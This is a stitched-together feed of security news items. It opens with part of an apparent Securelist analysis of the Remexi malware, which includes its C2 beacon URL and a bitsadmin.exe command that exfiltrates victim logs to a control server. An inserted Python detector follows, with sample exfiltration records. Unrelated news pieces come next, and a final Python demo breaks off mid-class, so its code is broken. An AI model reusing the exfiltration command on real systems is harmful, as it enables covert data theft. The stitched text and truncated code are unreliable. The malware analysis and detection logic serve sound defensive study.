http://<server_config>/asp.asp?ui=<host_name>nrg-<adapter_info>-<user_name>

Activity logging module (Splitter.exe)

This module is called from the main thread to obtain screenshots of windows whose titles are specified in the configuration CaptureSites field, bitmaps and text from clipboard, etc.

SHA256 a77f9e441415dbc8a20ad66d4d00ae606faab370ffaee5604e93ed484983d3ff
MD5 1ff40e79d673461cd33bd8b68f8bb5b8
Compiled 2017.08.06 11:32:36 (GMT), 2.22
Type I386 Windows Console EXE
Size 101 888

Instead of implementing this auxiliary module as a dynamic-link library with corresponding exported functions, the developers chose a standalone executable that events.exe starts with the following parameters:

Parameter Description
-scr Screenshot file name to save in Cache006 subdirectory, zipped with password from configuration. Can capture all screen (“AllScreen”) or the active window (“ActiveWindow”)
-ms Screenshot file name to save in Cache006 subdirectory, zipped with password from configuration. Specifies the screen coordinates to take
-zip Name of the password-protected zip archive (password taken from configuration data)
-clipboard Screenshot file name where a bitmap from the clipboard is saved in Cache005 subdirectory, zipped with password from configuration

Data exfiltration

Exfiltration is done through the bitsadmin.exe utility. The BITS mechanism has existed from Windows XP through the current Windows 10 versions and was designed to create download/upload jobs, mostly for updating the OS itself. The following is the command used to exfiltrate data from the victim to the C2:

bitsadmin.exe /TRANSFER HelpCenterUpload /UPLOAD /PRIORITY normal "<control_server>/YP01_<victim_fingerprint>_<log_file_name>" "<log_file_name>"
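As an added example (not code from the Securelist write-up), the following Python runs detection rules for the two bitsadmin.exe command lines above and the expand.exe unpacking step over constructed process-creation records; the record format, host and user names, paths, and the 198.51.100.7 / 203.0.113.9 addresses are assumptions.

```python
"""Detection logic for the Remexi bitsadmin.exe / expand.exe command lines.

Added example, not code from the Securelist write-up. It scans constructed
process-creation records (one per line, in the assumed shape
"<timestamp> host=<h> user=<u> cmd=<command line>") for:
  * BITS jobs named HelpCenterDownload / HelpCenterUpload,
  * the /asp.asp?ui=<host>nrg-... beacon URL,
  * the YP01_<fingerprint>_<log> upload path,
  * expand.exe unpacking HCK.cab,
  * and, as a weaker generic signal, any BITS transfer to a bare-IP server.
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import List, Tuple
from urllib.parse import urlsplit

# Assumed log-line shape for a process-creation record.
EVENT_RE = re.compile(
    r"^(?P<ts>\S+ \S+) host=(?P<host>\S+) user=(?P<user>\S+) cmd=(?P<cmd>.*)$"
)
# Patterns built from the command lines quoted in the analysis above.
BITS_JOB_RE = re.compile(
    r"bitsadmin(?:\.exe)?\s+/TRANSFER\s+(?P<job>\S+)\s+/(?P<dir>DOWNLOAD|UPLOAD)\b"
    r".*?(?P<url>https?://[^\s\"]+)",
    re.IGNORECASE,
)
REMEXI_JOBS = {"helpcenterdownload", "helpcenterupload"}
BEACON_URL_RE = re.compile(r"/asp\.asp\?ui=[^\s\"]*nrg-", re.IGNORECASE)
UPLOAD_PATH_RE = re.compile(r"/YP01_[^\s\"_]+_[^\s\"]+", re.IGNORECASE)
EXPAND_CAB_RE = re.compile(r"expand(?:\.exe)?\s+-r\s+.*?HCK\.cab", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    line_no: int   # 1-based index of the record that fired
    rule: str      # detection rule name
    detail: str    # host, user and the extracted evidence


def url_host_is_ip(url: str) -> bool:
    """True when the URL names its server by literal IP address (the analysis
    notes the BITS tasks address external resources that way)."""
    host = urlsplit(url).hostname or ""
    try:
        ipaddress.ip_address(host)
    except ValueError:
        return False
    return True


def match_remexi(cmdline: str) -> List[Tuple[str, str]]:
    """Return (rule, evidence) pairs for every indicator found in one command line."""
    hits: List[Tuple[str, str]] = []
    m = BITS_JOB_RE.search(cmdline)
    if m:
        job, direction, url = m.group("job"), m.group("dir").upper(), m.group("url")
        if job.lower() in REMEXI_JOBS:
            hits.append(("remexi_bits_job", f"{job} {direction} {url}"))
        elif url_host_is_ip(url):
            # Lower-confidence generic signal, still worth triage without the job name.
            hits.append(("bits_transfer_to_ip", f"{job} {direction} {url}"))
    m = BEACON_URL_RE.search(cmdline)
    if m:
        hits.append(("remexi_beacon_url", m.group(0)))
    m = UPLOAD_PATH_RE.search(cmdline)
    if m:
        hits.append(("remexi_upload_path", m.group(0)))
    if EXPAND_CAB_RE.search(cmdline):
        hits.append(("remexi_cab_unpack", "expand.exe HCK.cab"))
    return hits


def scan_events(lines: List[str]) -> List[Finding]:
    """Run every rule over each record; lines in another shape are skipped."""
    findings: List[Finding] = []
    for no, line in enumerate(lines, start=1):
        m = EVENT_RE.match(line)
        if not m:
            continue
        for rule, evidence in match_remexi(m.group("cmd")):
            findings.append(Finding(no, rule, f"{m.group('host')} {m.group('user')}: {evidence}"))
    return findings


# Constructed sample records. 198.51.100.7 and 203.0.113.9 are documentation
# addresses standing in for a C2; hosts, users and paths are invented.
SAMPLE_EVENTS = [
    r'2019-01-30 09:12:00 host=WS-0412 user=CORP\jdoe cmd=expand.exe -r "C:\Users\jdoe\AppData\Roaming\Microsoft\Event Cache\HCK.cab" -f:* "C:\Users\jdoe\AppData\Roaming\Microsoft\Event Cache\"',
    r'2019-01-30 09:12:01 host=WS-0412 user=CORP\jdoe cmd=bitsadmin.exe /TRANSFER HelpCenterDownload /DOWNLOAD /PRIORITY normal http://198.51.100.7/asp.asp?ui=WS-0412nrg-Intel82579LM-jdoe "C:\Users\jdoe\AppData\Roaming\Microsoft\Event Cache\Cache001\cde00.acf"',
    r'2019-01-30 09:13:07 host=WS-0412 user=CORP\jdoe cmd=bitsadmin.exe /TRANSFER HelpCenterUpload /UPLOAD /PRIORITY normal "http://198.51.100.7/YP01_WS-0412-7f3a_upLog.txt" "upLog.txt"',
    r'2019-01-30 10:01:15 host=WS-0777 user=CORP\svc-wsus cmd=bitsadmin.exe /TRANSFER PatchPull /DOWNLOAD /PRIORITY normal http://updates.example.com/kb.cab C:\Temp\kb.cab',
    r'2019-01-30 10:45:52 host=WS-0777 user=CORP\msmith cmd=bitsadmin.exe /TRANSFER backup /UPLOAD /PRIORITY normal http://203.0.113.9/drop/archive.zip C:\Temp\archive.zip',
    r'2019-01-30 11:02:33 host=WS-0777 user=CORP\msmith cmd=expand.exe -r C:\Drivers\net.cab -f:* C:\Drivers\out',
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"line {f.line_no}: {f.rule:22} {f.detail}")
```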

Victims

The vast majority of the users targeted by this new variant of Remexi appear to have Iranian IP addresses. Some of these appear to be foreign diplomatic entities based in the country.

Attribution

The Remexi malware has been associated with an APT actor called Chafer by Symantec.

One of the human-readable encryption keys used is “salamati”. This is probably the Latin spelling for the word “health” in Farsi. Among the artifacts related to malware authors, we found in the binaries a .pdb path containing the Windows user name “Mohamadreza New”. Interestingly, the FBI website for wanted cybercriminals includes two Iranians called Mohammad Reza, although this could be a common name or even a false flag.

Conclusions

Activity of the Chafer APT group has been observed since at least 2015, but based on things like compilation timestamps and C&C registration, it’s possible they have been active for even longer. Traditionally, Chafer has been focusing on targets inside Iran, although their interests clearly include other countries in the Middle East.

We will continue to monitor how this set of activity develops in the future.

Indicators of compromise

Domains and IPs

108.61.189.174

Hardcoded mutexes

Local\TEMPDAHCE01
Local\zaapr
Local\reezaaprLog
Local\{Temp-00-aa-123-mr-bbb}

Scheduled task

CacheTask_<user_name_here>

Directory with malicious modules

Main malware directory: %APPDATA%\Microsoft\Event Cache
Commands from C2 in subdirectory: Cache001\cde00.acf

Events.exe persistence records in Windows system registry keys

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Activity Manager

Victims’ fingerprints stored in

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\PidRegData or
HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\PidRegData

RC4 encrypted C2 commands stored in

HKCU\SOFTWARE\Microsoft\Fax

HTTP request template

http://<server_ip_from_config>/asp.asp?ui=<host_name>nrg-<adapter_info>-<user_name>
and a bitsadmin.exe task to external network resources addressed by IP address

Securelist

Spam Injector Disguised as License Key in WordPress Website

Here at Sucuri, we clean WordPress websites every day. There are various types of common malware, but when we stumble upon a different scenario, our research team likes to dig deeper and conduct a complete investigation.

A license key is a place where a webmaster might not expect to find an infection, however, in this particular case, this is where we found one.

A Spam Injector Resembling a License Key

A client opened a malware removal ticket reporting some weird spam URLs injected onto their WordPress website.

Continue reading Spam Injector Disguised as License Key in WordPress Website at Sucuri Blog.

Cybersecurity Experts Share Insight For Data Privacy Day 2019

You’ll have to forgive my ignorance—but what is an appropriate gift for Data Privacy Day? Perhaps an encrypted portable drive? That might not be a bad idea, but what I have

The post Cybersecurity Experts Share Insight For Data Privacy Day 2019 appeared first on The Cyber Security Place.

What steps consumers need to take to protect themselves online

Yesterday was Data Privacy Day, so McAfee warned consumers that cybercriminals are continuing to access personal information through weak passwords, phishing emails, connected things, malicious apps and unsecure Wi-Fi networks. Weak Passwords Consumers often pick simple passwords for the multiple accounts they use daily, not realizing that choosing weak passwords can open the door to identity theft and identity. Tip: Use strong passwords that include uppercase and lowercase letters, numbers and symbols. Don’t use the … More

The post What steps consumers need to take to protect themselves online appeared first on Help Net Security.

What If Your VPN Keeps Logs and Why You Should Care

By David Balaban

Have you ever asked yourself the question: “So what if my VPN keeps logs?” Don’t worry. It’s a good question to ask. It means you’re actually curious about the nuances of data collection, management and how they affect you. In order to answer this question, we first have to delve into the inner workings of […]

This is a post from HackRead.com Read the original post: What If Your VPN Keeps Logs and Why You Should Care

Merging WhatsApp, Instagram, And Facebook Messenger – Zuckerberg’s Uncanny Idea

This one may not be good news for many. Zuckerberg has finally disclosed his idea of merging the three key

Merging WhatsApp, Instagram, And Facebook Messenger – Zuckerberg’s Uncanny Idea on Latest Hacking News.

A Look Into Why Free VPN’s Can Cause More Harm Than Good

Intrusion, falsified encryption and lack of transparency are just some of the flaws a user potentially receives with a free

A Look Into Why Free VPN’s Can Cause More Harm Than Good on Latest Hacking News.

Hacking the GCHQ Backdoor

Last week, I evaluated the security of a recent GCHQ backdoor proposal for communications systems. Furthering the debate, Nate Cardozo and Seth Schoen of EFF explain how this sort of backdoor can be detected:

In fact, we think when the ghost feature is active -- silently inserting a secret eavesdropping member into an otherwise end-to-end encrypted conversation in the manner described by the GCHQ authors -- it could be detected (by the target as well as certain third parties) with at least four different techniques: binary reverse engineering, cryptographic side channels, network-traffic analysis, and crash log analysis. Further, crash log analysis could lead unrelated third parties to find evidence of the ghost in use, and it's even possible that binary reverse engineering could lead researchers to find ways to disable the ghost capability on the client side. It should be obvious that none of these possibilities are desirable for law enforcement or society as a whole. And while we've theorized some types of mitigations that might make the ghost less detectable by particular techniques, they could also impose considerable costs to the network when deployed at the necessary scale, as well as creating new potential security risks or detection methods.

Other critiques of the system were written by Susan Landau and Matthew Green.

EDITED TO ADD (1/26): Good commentary on how to defeat the backdoor detection.

Encryption is key to protecting information as it travels outside the network

A new Vera report reveals stark numbers behind the mounting toll of data breaches triggered by cybercrime and accidents. One of the most recognized and mandated security controls, installed encryption tools protect

The post Encryption is key to protecting information as it travels outside the network appeared first on The Cyber Security Place.

El Chapo’s Encryption Defeated by Turning His IT Consultant

Impressive police work:

In a daring move that placed his life in danger, the I.T. consultant eventually gave the F.B.I. his system's secret encryption keys in 2011 after he had moved the network's servers from Canada to the Netherlands during what he told the cartel's leaders was a routine upgrade.

A Dutch article says that it's a BlackBerry system.

El Chapo had his IT person install "...spyware called FlexiSPY on the 'special phones' he had given to his wife, Emma Coronel Aispuro, as well as to two of his lovers, including one who was a former Mexican lawmaker." That same software was used by the FBI when his IT person turned over the keys. Yet again we learn the lesson that a backdoor can be used against you.

And it doesn't have to be with the IT person's permission. A good intelligence agency can use the IT person's authorizations without his knowledge or consent. This is why the NSA hunts sysadmins.

Slashdot thread. Hacker News thread. Boing Boing post.

Safeguard Encryption “worth checking out” says SC Magazine

SC Magazine’s labs team has taken a look at Sophos Safeguard Encryption. We’re delighted to say they scored the product a massive 4.75 out of 5! …adding the extra layer of file security, location-based file encryption and application-based encryption, makes this product worth checking out. You can read the full review here. If you’re looking […]

Del Rio City Hall Disables Internet Connection for All Departments after Ransomware Attack

Officials in the City of Del Rio have disabled the internet connection for all departments at City Hall following a ransomware attack. The City of Del Rio, which is located 152 miles west of San Antonio in Val Verde County, Texas, posted a statement to its website disclosing the attack. Its statement mainly offers insight […]

The post Del Rio City Hall Disables Internet Connection for All Departments after Ransomware Attack appeared first on The State of Security.

Alex Stamos on Content Moderation and Security

Former Facebook CISO Alex Stamos argues that increasing political pressure on social media platforms to moderate content will give them a pretext to turn all end-to-end crypto off -- which would be more profitable for them and bad for society.

If we ask tech companies to fix ancient societal ills that are now reflected online with moderation, then we will end up with huge, democratically-unaccountable organizations controlling our lives in ways we never intended. And those ills will still exist below the surface.

Opinion: Back to the Start for 2FA Adoption?

In a previous post, Tripwire asked contributors what their most memorable event of 2018 was. As a follow-up, guest author Bob Covello expands on his thoughts about two-factor authentication (2FA). We in the infosec community have made enormous progress towards getting multi-factor authentication the recognition it deserves. All the respected folks in the community have […]

The post Opinion: Back to the Start for 2FA Adoption? appeared first on The State of Security.

Malvertising Campaign Delivers Vidar Information Stealer and GandCrab Ransomware

Researchers have spotted a malvertising campaign that is delivering two payloads to victims: the Vidar information stealer and GandCrab ransomware.

Near the end of 2018, Malwarebytes Labs began tracking a malvertising campaign delivering a variety of payloads. Researchers analyzed the infection chain and traced it to the Fallout exploit kit. They observed this package downloading what they thought was the Arkei stealer, but a closer look revealed the malware to be Vidar, a customizable stealer of passwords, credit card details and digital wallet credentials.

At that point, Malwarebytes analysts looked into Vidar’s command-and-control (C&C) server, discovering that the attacks were retrieving GandCrab ransomware from that location. This sequence of events enables threat actors to first steal victims’ personal and financial information before extorting them for the return of their encrypted data.

A Busy Few Months for the Fallout Exploit Kit

The Fallout exploit kit has been busy over the past few months. In September 2018, FireEye observed the exploit kit targeting users in Japan, Korea, the Middle East, Southern Europe and other countries in the Asia-Pacific region. In that campaign, Fallout infected victims with GandCrab ransomware.

This package of exploits didn’t waste time in diversifying its payloads. Researchers at McAfee observed Fallout exposing users to Kraken ransomware in October 2018. That same month, Palo Alto Networks detected a campaign in which the exploit kit delivered Azorult malware, another threat capable of stealing important information.

How to Block GandCrab and Other Malvertising Payloads

As it continues to evolve, the Fallout exploit kit will likely begin delivering even more payloads. Security professionals should therefore help protect their organizations by consistently leveraging the four steps of vulnerability assessment to keep software up-to-date. Organizations should also help defend against ransomware like GandCrab by using an endpoint management solution to monitor their IT assets for suspicious activity.

The post Malvertising Campaign Delivers Vidar Information Stealer and GandCrab Ransomware appeared first on Security Intelligence.

Abine says Blur Password Manager User Information Exposed

Customers who use the Blur secure password manager by Abine may have had sensitive information leaked, according to a statement by Abine, the company that makes the product. 

The post Abine says Blur Password Manager User Information Exposed appeared first on The Security Ledger.

Judge Grants Final Approval of Record Data Breach Settlement in Anthem Class Action

On August 15, 2018, U.S. District Judge Lucy Koh signed an order granting final approval of the record $115 million class action settlement agreed to by Anthem Inc. in June 2017. As previously reported, Judge Koh signed an order granting preliminary approval of the settlement in August 2017.

The settlement arose out of a 2015 data breach that exposed the personal information of more than 78 million individuals, including names, dates of birth, Social Security numbers and health care ID numbers. The terms of the settlement include, among other things, the creation of a pool of funds to provide credit monitoring and reimbursement for out-of-pocket costs for customers.

“The Court finds that the Settlement is fair, adequate, and reasonable,” Judge Lucy Koh wrote in her opinion.

Under the $115 million settlement, $51 million will go to the victims. Of the $51 million, $17 million is earmarked for credit-monitoring services, $15 million will go to customers who suffered out-of-pocket costs from the data breach, and $13 million will go to customers who demonstrate that they already have credit-monitoring services. The judge awarded the plaintiffs’ attorneys $31.05 million in legal fees. Additionally, the consulting firm appointed to administer the settlement received $23 million.

The settlement also requires Anthem to make certain changes to its data security systems and cybersecurity practices, including adopting encryption protocols for sensitive data, for at least three years.

The case is In re Anthem, Inc. Data Breach Litig., N.D. Cal., No. 15-md-02617, final approval 8/15/18.

Application Development GDPR Compliance Guidance

Last week IBM developerWorks released a three-part guidance series I have written to help Application Developers develop GDPR compliant applications.

Developing GDPR Compliant Applications Guidance

The GDPR
The General Data Protection Regulation (GDPR) was created by the European Commission and Council to strengthen and unify Europe's data protection law, replacing the 1995 European Data Protection Directive. Although the GDPR is a European Union (EU) regulation, it applies to any organization outside Europe that handles the personal data of EU citizens. This includes the development of applications that are intended to process the personal information of EU citizens. Therefore, organizations that provide web applications, mobile apps, or traditional desktop applications that can indirectly process EU citizens' personal data or allow EU citizens to sign in are subject to the GDPR's privacy obligations. Organizations face the prospect of powerful sanctions should their applications fail to comply with the GDPR.

Part 1: A Developer's Guide to the GDPR
Part 1 summarizes the GDPR and explains how the privacy regulation impacts and applies to developing and supporting applications that are intended to be used by European Union citizens.

Part 2: Application Privacy by Design
Part 2 provides guidance for developing applications that are compliant with the European Union’s General Data Protection Regulation. 

Part 3: Minimizing Application Privacy Risk

Part 3 provides practical application development techniques that can alleviate an application's privacy risk.

Weekly Cyber Risk Roundup: Payment Card Breaches, Encryption Debate, and Breach Notification Laws

This past week saw the announcement of several new payment card breaches, including a point-of-sale breach at Applebee’s restaurants that affected 167 locations across 15 states.

The malware, which was discovered on February 13, 2018, was “designed to capture payment card information and may have affected a limited number of purchases” made at Applebee’s locations owned by RMH Franchise Holdings, the company said in a statement.

News outlets reported many of the affected locations had their systems infected between early December 2017 and early January 2018. Applebee’s has close to 2,000 locations around the world and 167 of them were affected by the incident.

In addition to Applebee’s, MenuDrive issued a breach notification to merchants saying that its desktop ordering site was injected with malware designed to capture payment card information. The incident impacted certain transactions from November 5, 2017 to November 28, 2017.

“We have learned that the malware was contained to ONLY the Desktop ordering site of the version that you are using and certain payment gateways,” the company wrote. “Thus, this incident was contained to a part of our system and did NOT impact the Mobile ordering site or any other MenuDrive versions.”

Finally, there is yet another breach notification related to Sabre Hospitality Solutions’ SynXis Central Reservations System — this time affecting Preferred Hotels & Resorts. Sabre said that an unauthorized individual used compromised user credentials to view reservation information, including payment card information, for a subset of hotel reservations that Sabre processed on behalf of the company between June 2016 and November 2017.

[Chart: 2018-03-10_ITTGroups]

Other trending cybercrime events from the week include:

  • Marijuana businesses targeted: MJ Freeway Business Solutions, which provides business management software to cannabis dispensaries, is notifying customers of unauthorized access to its systems that may have led to personal information being stolen. The Canadian medical marijuana delivery service JJ Meds said that it received an extortion threat demanding $1,000 in bitcoin in order to prevent a leak of customer information.
  • Healthcare breach notifications: The Kansas Department for Aging and Disability Services said that the personal information of 11,000 people was improperly emailed to local contractors by a now-fired employee. Front Range Dermatology Associates announced a breach related to a now-fired employee providing patient information to a former employee. Investigators said two Florida Hospital employees stole patient records, and local news reported that 9,000 individuals may have been impacted by the theft.
  • Notable data breaches: Ventiv Technology, which provides workers’ compensation claim management software solutions, is notifying customers of a compromise of employee email accounts that were hosted on Office365 and contained personal information. Catawba County services employees had their personal information compromised due to the payroll and human resources system being infected with malware. Flexible Benefit Service Corporation said that an employee email account was compromised and used to search for wire payment information. A flaw in Nike’s website allowed attackers to read server data and could have been leveraged to gain greater access to the company’s systems. A researcher claimed that airline Emirates is leaking customer data.
  • Other notable events: Cary E. Williams CPA is notifying employees, shareholders, trustees and partners of a ransomware attack that led to unauthorized access to its systems. The cryptocurrency exchange Binance said that its users were the target of “a large scale phishing and stealing attempt” and those compromised accounts were used to perform abnormal trading activity over a short period of time. The spyware company Retina-X Studios said that it “is immediately and indefinitely halting its PhoneSheriff, TeenShield, SniperSpy and Mobile Spy products” after being “the victim of sophisticated and repeated illegal hackings.”

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.

[Chart: 2018-03-10_ITT]

Cyber Risk Trends From the Past Week

[Chart: 2018-03-10_RiskScores]

There were several regulatory stories that made headlines this week, including the FBI’s continued push for a stronger partnership with the private sector when it comes to encryption, allegations that Geek Squad techs act as FBI spies, and new data breach notification laws.

In a keynote address at Boston College’s cybersecurity summit, FBI Director Christopher Wray said that there were 7,775 devices that the FBI could not access due to encryption in fiscal 2017, despite having approval from a judge. According to Wray, that meant the FBI could not access more than half of the devices they tried to access during the period.

“Let me be clear: the FBI supports information security measures, including strong encryption,” Wray said. “Actually, the FBI is on the front line fighting cyber crime and economic espionage. But information security programs need to be thoughtfully designed so they don’t undermine the lawful tools we need to keep the American people safe.”

However, Ars Technica noted that a consensus of technical experts has said that what the FBI has asked for is impossible.

In addition, the Electronic Frontier Foundation obtained documents via a Freedom of Information Act lawsuit that revealed the FBI and Best Buy’s Geek Squad have been working together for decades. In some cases Geek Squad techs were paid as much as $1,000 to be informants, which the EFF argued was a violation of Fourth Amendment rights as the computer searches were not authorized by their owners.

Finally, the Alabama Senate unanimously passed the Alabama Breach Notification Act, and the bill will now move to the House.

“Alabama is one of two states that doesn’t have a data breach notification law,” said state Senator Arthur Orr, who sponsored Alabama’s bill. “In the case of a breach, businesses and organizations, including state government, are under no obligation to tell a person their information may have been compromised.”

With both Alabama and South Dakota recently introducing data breach notification legislation, every resident of the U.S. may soon be protected by a state breach notification law.

China Releases National Standard on Personal Information Security

On January 25, 2018, the Standardization Administration of China published the full text of the Information Security Technology – Personal Information Security Specification (the “Specification”). The Specification will come into effect on May 1, 2018. The Specification is voluntary, but could become influential within China because it establishes benchmarks for the processing of personal information by a wide variety of entities and organizations. In effect, the Specification constitutes a best practices guide for the collection, retention, use, sharing and transfer of personal information, and for the handling of related information security incidents.

The Specification divides personal information into two categories: personal information and sensitive personal information. “Sensitive personal information” includes personal information such as financial information, identifying information (such as an ID card, social insurance card, passport or driver’s license) and biological identifying information. The Specification provides specific requirements for the collection and use of sensitive personal information, as well as a sample functional interface with a data subject which could be incorporated by an enterprise in its products or services for the collection of sensitive personal information. The sample functional interface is a template for an interactive web page or software that is designed in accordance with the Specification, shows information such as the purpose, scope and transfer of personal information, and contains a checkbox to obtain consent.

The Specification reiterates the applicability of the principles of legitimacy and minimization, and the obligation to obtain the consent of a data subject, when collecting personal information, as well as the requirement to formulate and publish a privacy policy. These appear in earlier privacy-related laws and regulations, such as the Cybersecurity Law. In addition, the Specification provides several exceptions to the consent requirement, including when the collection and use of personal information is (1) directly related to national security, public security, a matter of material public interest, the investigation or trial of a crime or the enforcement of a judgement, or (2) requested by a data subject and is necessary for the execution and performance of a contract. The Specification also includes a template privacy policy. When collecting personal information indirectly from a third party (rather than directly from the data subject), an entity must require the party providing the information to explain the source by which the personal information was originally obtained, and to check whether that party obtained the consent of the data subject for the sharing, transfer or disclosure of the personal information.

According to the Specification, personal information must be retained for only the minimum extent necessary, and must be deleted or anonymized after the expiration of the retention period. Encryption measures must be adopted whenever sensitive personal information is retained. When a personal information controller ceases to provide a product or service, it must inform the relevant data subjects and must delete or anonymize all personal information retained in relation to the data subjects.

When an enterprise uses personal information, it must adopt controls on access and restrictions on the display of the information. The use of personal information must not go beyond the purpose stated when collecting it. Personal data subjects have the right to request correction, deletion and copies of personal information that pertains to them, as well as the right to withdraw their consent to the collection and use of the personal information. An enterprise must respond to the request of a data subject for correction, deletion or copying once it has verified his or her identity.

When an enterprise engages a third party to process personal information, it must conduct a security assessment to ensure that the processor possesses sufficient security capabilities. The enterprise must also require the third party to safeguard the personal information, and must also supervise the third party’s processing of the personal information. If an enterprise needs to share or transfer personal information, it must conduct a security assessment and adopt security measures, inform the data subjects of the purpose of the sharing or transfer and of the categories of recipients, and obtain the consent of the data subjects.

An enterprise must formulate a contingency plan for security incidents that involve personal information and conduct emergency drills at least once a year. In the event of an actual data breach incident, the enterprise must inform the affected data subjects by email, letter, telephone or other reasonable and efficient method. The notice must include information such as the substance of the incident and its impact, remedial measures that have been taken or will be taken, suggestions for the data subjects on how to reduce risks, remedial measures made available to data subjects, and the responsible person and his or her contact information.

The Specification requires entities to clarify which of their departments and staff would be responsible for the protection of personal information, and to establish a system to evaluate impacts on the security of personal information. Enterprises must also implement staff training and audit the security measures which they have adopted to protect personal information.

UK ICO Issues Unprecedented Fine Against Mobile Phone Retailer for Lax Security

On January 8, 2017, the UK Information Commissioner (“ICO”) issued an unprecedented monetary penalty of £400,000 against British mobile phone retailer The Car Phone Warehouse Limited. The ICO found that, following an attack on its system in 2015, the company had failed to take adequate steps to protect the personal data held on that system.

Between July and August 2015, the system hosting the company’s internal and external websites, which included personal data (including payment card data) of over 3,348,000 customers and 1,000 employees, was subject to an external cyber attack. In its decision, the ICO meticulously detailed the chronology of events and technical failures that led to the breach. The ICO found that the attacker entered and took hold of the system quickly and easily due to the company’s security deficiencies, which included:

  • the system’s software was years out of date;
  • software patching was seriously inadequate and no measures were in place to check whether the software updates or patches were implemented in accordance with the company’s policy;
  • the company did not have measures in place to control access credentials;
  • adequate vulnerability scanning and penetration testing measures were not in place at the time;
  • the company had no Web Application Firewall for monitoring traffic to and from its web applications, contrary to accepted security standards;
  • the system’s servers did not have antivirus technology, which was contrary to the company’s policy and accepted security standards;
  • the operating systems on the servers all used the same password, which was shared by more than 30 employees;
  • personal data was retained without good reason and inadequate measures were in place to identify and purge historic data; and
  • the encryption keys for historical transactions were not stored safely.

The ICO concluded that these facts constituted a multi-faceted violation of the Data Protection Principle 7 included in the Data Protection Act of 1998, which provides that appropriate technical and organizational measures should be taken against unauthorized or unlawful processing of personal data and against accidental loss or destruction of, or damage to, personal data.

This decision sets the tone for companies at the dawn of the entry into force of the GDPR. The ICO, in its public announcement of the decision, emphasized the importance of the Privacy by Design principle included in the GDPR, which requires companies to ensure that strong IT governance and information security measures are in place, tested and refreshed to comply with the provisions of the law.

Encryption would NOT have saved Equifax

I read a few articles this week suggesting that the big question for Equifax is whether or not their data was encrypted. The State of Massachusetts, speaking about the lawsuit it filed, said that Equifax "didn't put in safeguards like encryption that would have protected the data." Unfortunately, encryption, as it's most often used in these scenarios, would not have actually prevented the exposure of this data. This breach will have an enormous impact, so we should be careful to get the facts right and provide as much education as possible to lawmakers and really to anyone else affected.

We know that the attack took advantage of a flaw in Apache Struts (that should have been patched). Struts is a framework for building applications. It lives at the application tier. The data, obviously, resides at the data tier. Once the application was compromised, it really doesn't matter if the data was encrypted because the application is allowed to access (and therefore to decrypt) the data.

I won't get into all the various encryption techniques that are possible but there are two common types of data encryption for these types of applications. There's encryption of data in motion so that nobody can eavesdrop on the conversation as data moves between tiers or travels to the end users. And there's encryption of data at rest that protects data as it's stored on disk so that nobody can pick up the physical disk (or the data file, depending on how the encryption is applied) and access the data. Once the application is authenticated against the database and runs a query against the data, it is able to access, view, and act upon the data even if the data was encrypted while at rest.

Note that there is a commonly-applied technique that applies at-rest encryption at the application tier. I don't want to confuse the conversation with too much detail, but it usually involves inserting some code into the application to encrypt/decrypt. I suspect that if the application is compromised then app-tier encryption would have been equally unhelpful.

The bottom line here is that information security requires a broad, layered defense strategy. There are numerous types of attacks. A strong security program addresses as many potential attack vectors as possible within reason. (My use of "within reason" is a whole other conversation. Security strategies should evaluate risk in terms of likelihood of an attack and the damage that could be caused.) I already wrote about a layered approach to data protection within the database tier. But that same approach of layering security applies to application security (and information security in general). You have to govern the access controls, ensure strong enough authentication, understand user context, identify anomalous behavior, encrypt data, and, of course, patch your software and maintain your infrastructure. This isn't a scientific analysis. I'm just saying that encryption isn't a panacea and probably wouldn't have helped at all in this case.
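To make the two points above concrete (at-rest encryption is transparent to whoever runs as the application, and an extra layer can still limit the damage), here is an added example that is not Equifax's, Struts', or any vendor's code. It simulates a data tier with per-field encryption in an in-memory SQLite table, shows that the application tier decrypts freely because it holds the key, and then adds a guard that caps and alerts on bulk decryption by one principal. The cipher is a constructed HMAC-SHA256 keystream with an HMAC tag, a stand-in for a real AEAD such as AES-GCM, and all record values are constructed sample data.

```python
"""Added example: why at-rest encryption cannot stop a compromised app tier,
and one further layer (a bulk-decrypt cap with alerting) that still helps."""
import hashlib
import hmac
import os
import sqlite3

# Stand-in cipher for illustration only: HMAC-SHA256 keystream (CTR style)
# plus an HMAC tag. A real deployment would use an AEAD such as AES-GCM.
NONCE_LEN, TAG_LEN = 12, 32


def _keystream(key, nonce, length):
    out, counter = b"", 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def encrypt_field(key, plaintext):
    nonce = os.urandom(NONCE_LEN)
    data = plaintext.encode()
    ct = bytes(a ^ b for a, b in zip(data, _keystream(key, nonce, len(data))))
    tag = hmac.new(key, nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag


def decrypt_field(key, blob):
    nonce, ct, tag = blob[:NONCE_LEN], blob[NONCE_LEN:-TAG_LEN], blob[-TAG_LEN:]
    if not hmac.compare_digest(tag, hmac.new(key, nonce + ct, hashlib.sha256).digest()):
        raise ValueError("ciphertext failed integrity check")
    return bytes(a ^ b for a, b in zip(ct, _keystream(key, nonce, len(ct)))).decode()


class CustomerStore:
    """Data tier with per-field at-rest encryption. The key lives with the
    application (in practice fetched from a KMS), which is exactly why any
    code executing as the application can read plaintext."""

    def __init__(self, key):
        self.key = key
        self.db = sqlite3.connect(":memory:")
        self.db.execute("CREATE TABLE customers (id INTEGER PRIMARY KEY, ssn BLOB)")

    def add(self, cid, ssn):
        self.db.execute("INSERT INTO customers VALUES (?, ?)", (cid, encrypt_field(self.key, ssn)))

    def raw_row(self, cid):
        """What someone holding only the disk or data file sees: ciphertext."""
        return self.db.execute("SELECT ssn FROM customers WHERE id = ?", (cid,)).fetchone()[0]

    def get_ssn(self, cid):
        """What the (possibly compromised) application tier sees: plaintext."""
        return decrypt_field(self.key, self.raw_row(cid))


class AccessGuard:
    """Additional layer: cap decrypted records per principal per time window and
    raise an alert at the cap. A request serving one customer never needs
    dozens of records, so a bulk pull through the app is anomalous."""

    def __init__(self, store, max_per_window, window_s=60.0):
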